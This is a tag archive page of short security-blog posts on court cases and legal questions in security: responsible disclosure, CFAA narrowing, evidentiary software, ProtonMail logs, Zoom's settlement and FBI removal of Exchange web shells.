Entries Tagged "courts"

Page 3 of 29

Missouri Governor Doesn’t Understand Responsible Disclosure

The Missouri governor wants to prosecute the reporter who discovered a security vulnerability in a state’s website, and then reported it to the state.

The newspaper agreed to hold off publishing any story while the department fixed the problem and protected the private information of teachers around the state.

[…]

According to the Post-Dispatch, one of its reporters discovered the flaw in a web application allowing the public to search teacher certifications and credentials. No private information was publicly visible, but teacher Social Security numbers were contained in HTML source code of the pages.

The state removed the search tool after being notified of the issue by the Post-Dispatch. It was unclear how long the Social Security numbers had been vulnerable.

[…]

Chris Vickery, a California-based data security expert, told The Independent that it appears the department of education was “publishing data that it shouldn’t have been publishing.

“That’s not a crime for the journalists discovering it,” he said. “Putting Social Security numbers within HTML, even if it’s ‘non-display rendering’ HTML, is a stupid thing for the Missouri website to do and is a type of boneheaded mistake that has been around since day one of the Internet. No exploit, hacking or vulnerability is involved here.”

In explaining how he hopes the reporter and news organization will be prosecuted, [Gov.] Parson pointed to a state statute defining the crime of tampering with computer data. Vickery said that statute wouldn’t work in this instance because of a recent decision by the U.S. Supreme Court in the case of Van Buren v. United States.

One hopes that someone will calm the governor down.

Brian Krebs has more.

EDITED TO ADD (11/12): The governor doubled down a few days later.

Posted on October 18, 2021 at 6:20 AMView Comments

Suing Infrastructure Companies for Copyright Violations

It’s a matter of going after those with deep pockets. From Wired:

Cloudflare was sued in November 2018 by Mon Cheri Bridals and Maggie Sottero Designs, two wedding dress manufacturers and sellers that alleged Cloudflare was guilty of contributory copyright infringement because it didn’t terminate services for websites that infringed on the dressmakers’ copyrighted designs….

[Judge] Chhabria noted that the dressmakers have been harmed “by the proliferation of counterfeit retailers that sell knock-off dresses using the plaintiffs’ copyrighted images” and that they have “gone after the infringers in a range of actions, but to no avail—every time a website is successfully shut down, a new one takes its place.” Chhabria continued, “In an effort to more effectively stamp out infringement, the plaintiffs now go after a service common to many of the infringers: Cloudflare. The plaintiffs claim that Cloudflare contributes to the underlying copyright infringement by providing infringers with caching, content delivery, and security services. Because a reasonable jury could not—at least on this record—conclude that Cloudflare materially contributes to the underlying copyright infringement, the plaintiffs’ motion for summary judgment is denied and Cloudflare’s motion for summary judgment is granted.”

I was an expert witness for Cloudflare in this case, basically explaining to the court how the service works.

Posted on October 13, 2021 at 9:47 AMView Comments

ProtonMail Now Keeps IP Logs

After being compelled by a Swiss court to monitor IP logs for a particular user, ProtonMail no longer claims that “we do not keep any IP logs.”

EDITED TO ADD (9/14): This seems to be more complicated. ProtonMail is not yet saying that they keep logs. Their privacy policy still states that they do not keep logs except in certain circumstances, and outlines those circumstances. And ProtonMail’s warrant canary has an interesting list of data orders they have received from various authorities, whether they complied, and why or why not.

Posted on September 10, 2021 at 6:10 AMView Comments

Zoom Lied about End-to-End Encryption

The facts aren’t news, but Zoom will pay $85M—to the class-action attorneys, and to users—for lying to users about end-to-end encryption, and for giving user data to Facebook and Google without consent.

The proposed settlement would generally give Zoom users $15 or $25 each and was filed Saturday at US District Court for the Northern District of California. It came nine months after Zoom agreed to security improvements and a “prohibition on privacy and security misrepresentations” in a settlement with the Federal Trade Commission, but the FTC settlement didn’t include compensation for users.

Posted on August 5, 2021 at 6:25 AMView Comments

Risks of Evidentiary Software

Over at Lawfare, Susan Landau has an excellent essay on the risks posed by software used to collect evidence (a Breathalyzer is probably the most obvious example).

Bugs and vulnerabilities can lead to inaccurate evidence, but the proprietary nature of software makes it hard for defendants to examine it.

The software engineers proposed a three-part test. First, the court should have access to the “Known Error Log,” which should be part of any professionally developed software project. Next the court should consider whether the evidence being presented could be materially affected by a software error. Ladkin and his co-authors noted that a chain of emails back and forth are unlikely to have such an error, but the time that a software tool logs when an application was used could easily be incorrect. Finally, the reliability experts recommended seeing whether the code adheres to an industry standard used in an non-computerized version of the task (e.g., bookkeepers always record every transaction, and thus so should bookkeeping software).

[…]

Inanimate objects have long served as evidence in courts of law: the door handle with a fingerprint, the glove found at a murder scene, the Breathalyzer result that shows a blood alcohol level three times the legal limit. But the last of those examples is substantively different from the other two. Data from a Breathalyzer is not the physical entity itself, but rather a software calculation of the level of alcohol in the breath of a potentially drunk driver. As long as the breath sample has been preserved, one can always go back and retest it on a different device.

What happens if the software makes an error and there is no sample to check or if the software itself produces the evidence? At the time of our writing the article on the use of software as evidence, there was no overriding requirement that law enforcement provide a defendant with the code so that they might examine it themselves.

[…]

Given the high rate of bugs in complex software systems, my colleagues and I concluded that when computer programs produce the evidence, courts cannot assume that the evidentiary software is reliable. Instead the prosecution must make the code available for an “adversarial audit” by the defendant’s experts. And to avoid problems in which the government doesn’t have the code, government procurement contracts must include delivery of source code­—code that is more-or-less readable by people—­for every version of the code or device.

Posted on June 29, 2021 at 9:12 AMView Comments

The Supreme Court Narrowed the CFAA

In a 6-3 ruling, the Supreme Court just narrowed the scope of the Computer Fraud and Abuse Act:

In a ruling delivered today, the court sided with Van Buren and overturned his 18-month conviction.

In a 37-page opinion written and delivered by Justice Amy Coney Barrett, the court explained that the “exceeds authorized access” language was, indeed, too broad.

Justice Barrett said the clause was effectively making criminals of most US citizens who ever used a work resource to perform unauthorized actions, such as updating a dating profile, checking sports scores, or paying bills at work.

What today’s ruling means is that the CFAA cannot be used to prosecute rogue employees who have legitimate access to work-related resources, which will need to be prosecuted under different charges.

The ruling does not apply to former employees accessing their old work systems because their access has been revoked and they’re not “authorized” to access those systems anymore.

More.

It’s a good ruling, and one that will benefit security researchers. But the confusing part is footnote 8:

For present purposes, we need not address whether this inquiry turns only on technological (or “code-based”) limitations on access, or instead also looks to limits contained in contracts or policies.

It seems to me that this is exactly what the ruling does address. The court overturned the conviction because the defendant was not limited by technology, but only by policies. So that footnote doesn’t make any sense.

I have written about this general issue before, in the context of adversarial machine learning research.

Posted on June 7, 2021 at 6:09 AMView Comments

The FBI Is Now Securing Networks Without Their Owners’ Permission

In January, we learned about a Chinese espionage campaign that exploited four zero-days in Microsoft Exchange. One of the characteristics of the campaign, in the later days when the Chinese probably realized that the vulnerabilities would soon be fixed, was to install a web shell in compromised networks that would give them subsequent remote access. Even if the vulnerabilities were patched, the shell would remain until the network operators removed it.

Now, months later, many of those shells are still in place. And they’re being used by criminal hackers as well.

On Tuesday, the FBI announced that it successfully received a court order to remove “hundreds” of these web shells from networks in the US.

This is nothing short of extraordinary, and I can think of no real-world parallel. It’s kind of like if a criminal organization infiltrated a door-lock company and surreptitiously added a master passkey feature, and then customers bought and installed those locks. And then if the FBI got a court order to fix all the locks to remove the master passkey capability. And it’s kind of not like that. In any case, it’s not what we normally think of when we think of a warrant. The links above have details, but I would like a legal scholar to weigh in on the implications of this.

Posted on April 14, 2021 at 9:56 AMView Comments

The Legal Risks of Security Research

Sunoo Park and Kendra Albert have published “A Researcher’s Guide to Some Legal Risks of Security Research.”

From a summary:

Such risk extends beyond anti-hacking laws, implicating copyright law and anti-circumvention provisions (DMCA §1201), electronic privacy law (ECPA), and cryptography export controls, as well as broader legal areas such as contract and trade secret law.

Our Guide gives the most comprehensive presentation to date of this landscape of legal risks, with an eye to both legal and technical nuance. Aimed at researchers, the public, and technology lawyers alike, its aims both to provide pragmatic guidance to those navigating today’s uncertain legal landscape, and to provoke public debate towards future reform.

Comprehensive, and well worth reading.

Here’s a Twitter thread by Kendra.

Posted on October 30, 2020 at 9:14 AMView Comments

Reverse-Engineering the Redactions in the Ghislaine Maxwell Deposition

Slate magazine was able to cleverly read the Ghislaine Maxwell deposition and reverse-engineer many of the redacted names.

We’ve long known that redacting is hard in the modern age, but most of the failures to date have been a result of not realizing that covering digital text with a black bar doesn’t always remove the text from the underlying digital file. As far as I know, this reverse-engineering technique is new.

EDITED TO ADD: A similar technique was used in 1991 to recover the Dead Sea Scrolls.

Posted on October 27, 2020 at 6:34 AMView Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.